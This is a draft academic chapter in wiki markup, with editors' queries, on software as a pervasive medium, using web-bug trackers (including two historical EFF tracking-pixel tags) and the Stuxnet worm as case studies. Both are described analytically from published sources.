Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have a entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims 'an eye on 1091622 websites': an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
